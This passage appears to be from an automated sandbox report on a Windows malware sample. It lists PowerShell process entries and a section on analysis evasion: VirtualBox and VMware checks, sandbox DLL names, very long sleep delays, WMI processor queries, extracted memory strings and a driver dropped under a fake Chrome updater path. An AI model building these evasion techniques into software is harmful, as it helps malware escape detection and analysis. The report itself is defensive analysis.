                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
                          Source: file.exe, 00000000.00000000.2090227189.0000000001282000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: SBIEDLL.DLLL
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIES
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Roaming\cdttvvcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\cdttvvcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\cdttvvcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\cdttvvcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\cdttvvcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\cdttvvcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\file.exe TID: 2224Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exe TID: 5980Thread sleep time: -31000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep count: 6067 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704Thread sleep count: 2204 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1492Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\explorer.exe TID: 5960Thread sleep count: 479 > 30
                          Source: C:\Windows\explorer.exe TID: 1428Thread sleep count: 1317 > 30
                          Source: C:\Windows\explorer.exe TID: 1428Thread sleep time: -131700s >= -30000s
                          Source: C:\Windows\explorer.exe TID: 2832Thread sleep count: 814 > 30
                          Source: C:\Windows\explorer.exe TID: 2832Thread sleep time: -81400s >= -30000s
                          Source: C:\Windows\explorer.exe TID: 3496Thread sleep count: 291 > 30
                          Source: C:\Windows\explorer.exe TID: 4144Thread sleep count: 276 > 30
                          Source: C:\Windows\explorer.exe TID: 5908Thread sleep count: 232 > 30
                          Source: C:\Windows\explorer.exe TID: 1428Thread sleep count: 3039 > 30
                          Source: C:\Windows\explorer.exe TID: 1428Thread sleep time: -303900s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1936Thread sleep count: 4495 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep count: 1561 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1424Thread sleep time: -7378697629483816s >= -30000s
                          Source: C:\Program Files\Google\Chrome\updater.exe TID: 6828Thread sleep time: -31000s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep count: 5325 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432Thread sleep count: 2634 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep time: -3689348814741908s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7028Thread sleep count: 5975 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140Thread sleep count: 2153 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep time: -3689348814741908s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep count: 5121 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1136Thread sleep count: 3108 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\explorer.exe TID: 2052Thread sleep count: 101 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376Thread sleep count: 5080 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356Thread sleep count: 2943 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_3-9709
                          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6067Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2204Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4069Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 807Jump to behavior
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 479
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1317
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 814
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3039
                          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 853
                          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 860
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4495
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1561
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2457
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6162
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5325
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2634
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5975
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2153
                          Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 7888
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5121
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3108
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5080
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2943
                          Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeFile opened / queried: VBoxGuest
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeFile opened / queried: VBoxTrayIPC
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeFile opened / queried: \pipe\VBoxTrayIPC
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeFile opened / queried: VBoxMiniRdrDN
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeEvaded block: after key decisiongraph_3-10011
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeAPI call chain: ExitProcess graph end nodegraph_2-3224
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeAPI call chain: ExitProcess graph end nodegraph_2-2972
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: sbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--P
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
